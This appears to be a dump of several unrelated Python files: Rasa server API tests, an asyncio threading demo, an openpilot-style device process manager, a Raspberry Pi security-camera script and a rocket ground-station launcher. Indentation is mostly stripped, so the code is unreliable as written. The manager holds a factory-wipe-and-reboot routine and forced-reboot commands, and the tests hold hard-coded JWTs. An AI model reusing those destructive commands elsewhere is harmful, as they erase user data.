def test_train_core_success(
rasa_app, default_stack_config, default_stories_file, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(open(default_stories_file))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_missing_config(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config=None)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_missing_training_data(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_internal_error(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 500
def test_evaluate_stories(rasa_app, default_stories_file):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app.post("/model/test/stories", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicTestClient, default_stories_file
):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == 409
def test_evaluate_stories_end_to_end(rasa_app, end_to_end_story_file):
stories = rasa.utils.io.read_file(end_to_end_story_file)
_, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_intent(rasa_app, default_nlu_data):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicTestClient, default_nlu_data
):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app_nlu.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_with_query_param(
rasa_app, trained_nlu_model, default_nlu_data
):
_, response = rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}", data=nlu_data
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, "name": "greet"},
"text": "hello",
},
},
]
}
}
_, response = rasa_app.post(
"/model/predict", json=data, headers={"Content-Type": "application/json"}
)
content = response.json
assert response.status == 200
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
_, response = rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == 200
assert content["paused"] is False
assert content["slots"] == {"location": None, "cuisine": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
"name": "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app, event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 4
evt = tracker.get("events")[3]
deserialised_event = Event.from_parameters(evt)
assert deserialised_event == event
assert deserialised_event.timestamp > tracker.get("events")[2]["timestamp"]
def test_push_multiple_events(rasa_app: SanicTestClient):
cid = str(uuid.uuid1())
conversation = f"/conversations/{cid}"
events = [e.as_dict() for e in test_events]
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{cid}/tracker")
tracker = tracker_response.json
assert tracker is not None
    # the tracker also contains the initial session events
    # (`action_session_start`, `session_started`, `action_listen`)
assert len(tracker.get("events")) == len(test_events) + 3
assert tracker.get("events")[3:] == events
def test_put_tracker(rasa_app: SanicTestClient):
data = [event.as_dict() for event in test_events]
_, response = rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
content = response.json
assert response.status == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 200
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 403
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
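# Note: tokens like the ones hard-coded above can be regenerated with PyJWT,
# assuming the secured test server is configured with the JWT secret "core":
#
#     import jwt
#     jwt.encode({"user": {"username": "testadmin", "role": "admin"}}, "core", algorithm="HS256")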
def test_list_routes(default_agent: Agent):
from rasa import server
app = server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
def test_unload_model_error(rasa_app: SanicTestClient):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = rasa_app.delete("/model")
assert response.status == 204
def test_get_domain(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain", headers={"accept": "application/json"})
content = response.json
assert response.status == 200
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain")
assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
def test_load_model_from_model_server(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
import rasa.core.jobs
rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
_, response = rasa_app.put("/model")
assert response.status == 400
def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
data = {"model_file": "some-random-path"}
_, response = rasa_app.put("/model", json=data)
assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "test_execute")
data = {"name": "utter_greet"}
_, response = rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
test_sender = "test_execute_with_missing_action_name"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 400
def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
test_sender = "test_execute_with_not_existing_action"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
data = {"name": "greet"}
_, response = rasa_app.post("/conversations/test_trigger/trigger_intent", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 400
def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 404
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
([RestInput(), SlackInput("test")], "slack", SlackBot),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
|
multithreadAsync.py
|
import asyncio
from threading import Thread
from multiprocessing import Process
from time import sleep
from LibF.GPA import *
#Multi Thread Concurrency
#"@MAN.main.task" adds the function below to a tasks list
@MAN.main.task
#MAN is a built in manager for having up to 4 concurrent threads
async def helloWorld():
for i in range(3):
print("Hello World!")
await asyncio.sleep(0.2)
@MAN.main.task
async def anotherOne():
for i in range(3):
print("I'm running concurrently!")
await asyncio.sleep(0.1)
@MAN.side.task
#MAN is a built in manager for having up to 4 concurrent threads (class 'MTManager')
async def pythonista():
for i in range(3):
print("We love Python!")
await asyncio.sleep(0.3)
@MAN.side.task
async def anotherThread():
for i in range(3):
print("I'm on another thread!")
await asyncio.sleep(0.1)
#Execution looks like this when using multiple threads
if __name__ == '__main__':
    #MAN has 4 available threads: main, side, back, and util
    T1 = Thread(target=MAN.main.run, args=())
    T2 = Thread(target=MAN.side.run, args=())
    #You could also run other functions in one of the threads, for example:
    T3 = Thread(target=print, args=("Third Thread",))
T1.start()
T2.start()
T3.start()
#T1.join() <- You may join the threads if you so choose
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
if __name__ == "__main__":
if os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 6):
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"controlsd": "selfdrive.controls.controlsd",
"radard": "selfdrive.controls.radard",
"ubloxd": "selfdrive.locationd.ubloxd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'gpsd',
'ubloxd',
'updated',
]
car_started_processes = [
'controlsd',
'loggerd',
'sensord',
'radard',
'visiond',
'proclogd',
'orbd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
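# Usage sketch (illustrative only): an additional daemon could be registered
# with a hypothetical module path before the run loop starts, e.g.
#   register_managed_process("mydaemon", "selfdrive.mydaemon", car_started=True)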
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
    # can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
for p in running:
cloudlog.debug(" running %s %s" % (p, running[p]))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.iterkeys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['radard']
if os.getenv("DEFAULTD") is not None:
managed_processes["controlsd"] = "selfdrive.controls.defaultd"
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process)
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "0")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
main.py
|
# Name: Nigel Jacob
# Date: 26/07/2021
import config
import cv2 as cv
import RPi.GPIO as GPIO
from threading import Thread
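# Note: the imported config module is expected to expose the attributes used
# below -- cap (the camera capture object), net (a detection model with a
# .detect() method), classNames, ACCURACY, RED, GREEN, firstRun, alert() and
# button. Their definitions live in config.py and are not shown here.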
def analyse() -> None:
print("Press 'q' to exit.")
while not cv.waitKey(1) & 0xFF == ord("q"):
try:
(success, img) = config.cap.read()
(class_ids, confs, bbox) = config.net.detect(img, confThreshold=config.ACCURACY)
except cv.error as e:
print(e)
break
if len(class_ids) != 0:
for (classId, confidence, box) in zip(
class_ids.flatten(), confs.flatten(), bbox
):
object_identified = config.classNames[classId - 1].upper()
prob_correct = round(confidence * 100, 2)
if object_identified == "PERSON":
color = config.RED
# Start the alarm thread unless one is already sounding
if config.firstRun:
alarm = Thread(target=config.alert)
config.firstRun = False
if not alarm.is_alive():
alarm = Thread(target=config.alert)
alarm.start()
else:
color = config.GREEN
# Draw box around image and label object identified
cv.rectangle(img, box, color=color, thickness=2)
cv.putText(
img,
"%s %d%%" % (object_identified, prob_correct),
(box[0] + 5, box[1] + 20),
cv.FONT_HERSHEY_COMPLEX_SMALL,
1,
color,
2,
)
cv.imshow("Security Camera Feed", img)
if config.button.is_pressed:
break
cv.destroyAllWindows()
GPIO.cleanup()
if __name__ == "__main__":
analyse()
|
run.py
|
"""
Martlet 4/Pulsar Ground Control Software
CUSF 2018/19
"""
from gcs import usb
from gcs import gui_interface
from gcs import logging
import time
import signal
import multiprocessing
import argparse
# Todo: freeze script into executable once done
def run(args):
"""Initialise and run the backend.
args -- command line arguments
"""
############################################################################
# Create communication links between processes:
############################################################################
print("Initialising Martlet IV Ground Station...")
# Pipe USB data to logging processes
log_usb_pipe, usb_log_pipe = multiprocessing.Pipe(duplex=False)
# Duplex pipe between usb and gui processes
usb_gui_pipe, gui_usb_pipe = multiprocessing.Pipe(True)
############################################################################
# Define and start processes
############################################################################
log_ready = multiprocessing.Event() # Log process ready flag
log_ready.clear()
usb_ready = multiprocessing.Event() # USB process ready flag
usb_ready.clear()
gui_exit = multiprocessing.Event() # Flag for gui exit
gui_exit.clear()
print("Starting processes...")
# Todo: add ready signal to each process?
# Start gui/main process
gui_process = multiprocessing.Process(target=gui_interface.run, args=(gui_usb_pipe, gui_exit))
gui_process.start()
# Start logging process
log_process = multiprocessing.Process(target=logging.run, args=(log_usb_pipe, gui_exit, log_ready, "../logs"))
log_process.start()
while not log_ready.is_set():
# Wait for logging process to finish starting up
time.sleep(0.1)
# Start usb parsing process
usb_process = multiprocessing.Process(target=usb.run,
args=(args.port, usb_gui_pipe, usb_log_pipe, gui_exit, usb_ready))
usb_process.start()
while not usb_ready.is_set():
# Wait for USB process to finish starting up
time.sleep(0.1)
# # Start gui/main process
# gui_process = multiprocessing.Process(target=gui_interface.run, args=(gui_usb_pipe, gui_exit))
# gui_process.start()
print("Running...")
gui_process.join()
